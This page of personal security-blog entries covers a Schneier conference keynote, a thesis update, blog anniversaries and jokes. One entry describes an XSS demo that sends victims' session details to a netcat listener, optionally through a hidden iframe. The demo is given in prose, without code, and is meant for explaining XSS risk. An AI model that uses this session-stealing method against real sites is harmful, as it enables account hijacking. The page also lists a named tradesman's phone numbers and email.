Definately worth a read for those of you that think Ubuntu is a linux distribution.
tcpdump -i eth0 > /dev/audio
Awesome! Credit to zeroday and sound of traffic project.
There is something very big going on in the security world. It is rare to see things pushed forward quite this fast. I'm talking about the latest advances in web application security. I'm calling it Web Hacking 2.0 (gettit?).
Continue reading "Web Hacking 2.0 - This is BIG"
ITWeb will be holding their 2007 Security Summit. The keynotes are Bruce Schneier and Phil Zimmerman. The best part is, three of our abstracts were accepted. Nithen, Yusuf and Johann will be presenting.
I sat up one night trying to figure out what I would say to Schneier. He is one of the reasons I got into security as a job. I remember having just finished my honours degree (our first postgrad degree before a Masters) and reading Secret's and Lies. It made me realise I could turn my hobby into a job. How does one meet a 'celebrity' and not come across as a gushing teen ready to part with her bra? I don't know, but I am going to try hard to take him out to dinner.
So, if you will be near SA, or are prepared to fly here, come to the ITWeb Security Summit to watch us present :)
This week I was reviewing a security product and discovered a rather serious XSS in their web console. When I highlighted this to the product's technical team, they claimed it was a vulnerability in IIS and not their product. It was rather silly of them to claim that outputting javascript was the fault of the web server. However, it did highlight two interesting facts about XSS' to me: An alert box displaying 'XSS' or unintelligible session details means very little to many people who should know better. You need to have a canned, high-level, explanation about what the dangers of an XSS really are.
A quick an easy demo, which I put here mostly for my own memory, is to just change the window location to point to a machine where you have set up a netcat listener with the session details and url appended to the request. If you want to be stealthy, you can use a hidden iframe.
The quick summary is - if you need to have any work done on your DSTV / Multichoice installation, phone this guy:
Marcus
Supreme Electronics
Cell: 072 388 5660
Fax no: 086 651 9204
E-Mail: marcusp -<at>- telkomsa.net
Continue reading "The Best DSTV/Multichoice Installer EVAR!"
With the help of Jason, my thesis has undergone some major grammar surgery. The new version is available at the usual place. There have been over 32K worth of changes since I received the commentary back from the examiners. If you're interested in patch management, take a read.
The beginning of February has a few anniversaries; today marks the third birthday of my blog, and last week marked the first birthday of my job. And so I thought it would be a good time to talk about the last year.
The very short summary is that it has been a wonderful year in all aspects of my life. If you are interested in the rest of it, read on (Hi Mom).
Continue reading "Blogaversary III and the Year in Review"
RSnake has put up a really great write-up entitled, Death by a 1000 cuts. It describes how a series of minor security issues can be combined to form a very serious attack.
I spent most of my time dealing with security operational issues, where sometimes these sorts of minor issues are where I have to make concessions to get the big stuff done. I think this is a really great example that we security people need to take to developers and it operational staff to show them why defense-in-depth is necessary.
Continue reading "A Case Study for Defense in Depth"
Microsoft will be distributing earphones as a patch to the latest vulnerability in Vista. This vulnerability is highly critical and allows remote command execution, as long as 'remote' is the same as 'within hearing range'. Ha ha.
Today marks my first workaversary. I am celebrating the completion of my first year in the working world and at my company. It has been incredible, but I'm way too tired to say much about it. I felt I had to say something though. I'll save the long post for my third blogaversary.